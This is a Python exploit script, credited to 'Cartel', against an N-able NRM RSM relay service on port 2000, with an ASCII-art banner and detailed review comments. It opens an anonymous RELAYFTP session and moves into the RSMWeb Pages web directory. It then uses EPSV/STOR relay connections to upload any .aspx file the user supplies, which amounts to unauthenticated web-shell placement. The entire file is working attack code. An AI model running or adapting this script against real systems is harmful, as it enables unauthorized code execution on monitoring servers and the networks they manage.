#!/usr/bin/env python
import socket
from time import sleep
from sys import argv

# Start-up banner printed before the usage text.
# NOTE(review): this is a non-raw literal, so the "\\" on the art row
# containing "|    \\  \__" collapses to a single backslash and the two
# rows that end in a lone "\" are joined to the following row (a
# backslash before the newline is a line continuation).  Left exactly as
# the author wrote it because the intended rendering is not recoverable
# from this file.
asc = """

(    , )     (,
  .   '.' ) ('.    ',
   ). , ('.   ( ) (
  (_,) .'), ) _ _,
 /  _____/  / _  \    ____  ____   _____
 \____  \==/ /_\  \ _/ ___\/  _ \ /     \
 /       \/   |    \\  \__(  <_> )  Y Y  \
/______  /\___|__  / \___  >____/|__|_|  /
        \/         \/.-.    \/         \/:wq
                    (x.0)
                  '=.|w|.='
                  _=''"''=.
"""

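# Command sequence sent on the control connection before any transfer:
# the RELAYFTP handshake, an anonymous login, binary type and mode, and a
# change of directory into the RSMWeb\Pages folder.
# Every backslash is written as "\\": the resulting byte string is the
# same as before under Python 2, and the literal no longer contains the
# "\N..." sequence that Python 3 rejects as a malformed escape.
chat = ['RELAYFTP',
        'USER anonymous',
        'TYPE I',
        'MODE I',
        'CWD C:\\',
        'CWD C:\\Program Files (x86)\\N-able Technologies\\NRM\\RSMWeb\\Pages']

print(asc)

print("Cartel presents: rsm-relayftp-upload.py")
if len(argv) < 3:
    print("  usage: rsm-relayftp-upload.py [target] [file.aspx] [[-v]]")
    print("  ...will put [file.aspx] to target:2000/Pages/")
    raise SystemExit


HOST = argv[1]
# Port of the relay service; the script opens its data connections to the
# same host and port as the control connection.
PORT = 2000

# Verbose mode: sput() echoes every line sent ("> ") and received ("< ").
# Only the exact fourth argument "-v" turns it on.
debug = None
if len(argv) == 4 and argv[3] == "-v":
    debug = True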

def getsock():
    """Open and return a TCP connection to HOST:PORT.

    The same function serves the control connection and every data
    connection of the script, since both go to the same host and port.
    A 30 s timeout is set on the socket before connecting, so a target
    that does not answer raises socket.timeout instead of hanging; any
    socket error propagates to the caller.
    """
    conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    conn.settimeout(30)
    conn.connect((HOST, PORT))
    return conn

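def sput(s, p, r=1024):
    """Send *p* plus a trailing newline on socket *s* and return the reply.

    Args:
        s: a connected socket.
        p: the text to send; a single "\n" is appended.
        r: maximum number of bytes read back in the single recv() call
           (default 1024).  A longer reply is truncated at *r* bytes and
           anything arriving after the 0.1 s pause is left in the socket.

    Returns:
        The bytes received, as returned by socket.recv().

    Raises:
        socket.timeout / socket.error from the underlying send or recv.

    When the module-level ``debug`` flag is set, every line sent is echoed
    with a "> " prefix and every line received with a "< " prefix.
    """
    if debug:
        for line in p.split("\n"):
            print("> " + line)
    # sendall() keeps writing until every byte is out.  A bare send() may
    # stop short, which matters for the whole-file payload pushed after
    # STOR: a short write would silently upload a truncated file.
    s.sendall(p + "\n")
    # Give the peer a moment to answer before the single recv() below.
    sleep(0.1)
    data = s.recv(r)
    if debug:
        for line in data.split("\n"):
            print("< " + line)
    return data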

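print("[+] Setting up session...")
# Open the control connection and run the fixed pre-transfer command
# sequence.  Any socket failure -- refused connection, reset, or the 30 s
# timeout -- is reported once and the script stops.  The except is
# limited to socket.error (socket.timeout is a subclass) so that Ctrl-C
# and unrelated bugs are not hidden behind the same message.
try:
    s = getsock()
    for line in chat:
        sput(s, line)
except socket.error:
    print("[!] Something went wrong, either the server is not vulnerable or the request timed out.")
    raise SystemExit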


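def getid(data):
    """Extract the relay id from an EPSV reply.

    The reply carries the id between the first "|||" marker and the next
    "|" (``...|||<id>|...``); whatever precedes the marker is ignored.

    Args:
        data: the raw EPSV reply text.

    Returns:
        The id as a string.

    Raises:
        ValueError: if *data* contains no "|||" marker, so a malformed or
            error reply is reported together with its text instead of
            surfacing as a bare IndexError from a list subscript.
    """
    _, marker, rest = data.partition("|||")
    if not marker:
        raise ValueError("no '|||' marker in EPSV reply: %r" % (data,))
    return rest.split("|", 1)[0]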

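def _show_listing(ctl):
    """Request a directory listing over the control socket *ctl* and print it.

    One EPSV + LIST round: the id taken from the EPSV reply is presented
    on a second connection to the same port as "RELAYFTP<id>", and that
    connection carries the LIST output.  In debug mode sput() already
    echoes every received line, so the reply is printed here only when
    debug is off.  The data connection is always closed before returning.
    """
    relay_id = getid(sput(ctl, "EPSV"))
    print("[!] LIST output")
    print("---")
    sput(ctl, "LIST")
    data_conn = getsock()
    try:
        listing = sput(data_conn, "RELAYFTP%s" % relay_id)
    finally:
        data_conn.close()
    if not debug:
        print(listing)
    print("---")


def _upload(ctl, name, body):
    """Send *body* as file *name* through one EPSV + STOR round on *ctl*.

    The STOR command announces the byte count up front; the data
    connection is then bound with "RELAYFTP<id>" and the body is pushed
    down it.  The connection is closed once the body has been sent, which
    also signals the end of the transfer to the peer.
    """
    relay_id = getid(sput(ctl, "EPSV"))
    sput(ctl, "STOR %s|%s" % (name, len(body)))
    data_conn = getsock()
    try:
        # r=1 as in the original: only one byte of the reply to the
        # RELAYFTP line is read before the body goes out.
        sput(data_conn, "RELAYFTP%s" % relay_id, r=1)
        sput(data_conn, body)
    finally:
        data_conn.close()


print("[+] Testing EPSV...")
_show_listing(s)

# Read in binary mode: the session negotiated TYPE I and the byte count
# announced with STOR must equal what is sent, so no newline translation
# may happen on read.  The handle is released as soon as the read is done.
with open(argv[2], "rb") as fh:
    f = fh.read()
print("[!] STOR %s" % argv[2])
_upload(s, argv[2], f)

_show_listing(s)
s.close()
print("[+] execution finished")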

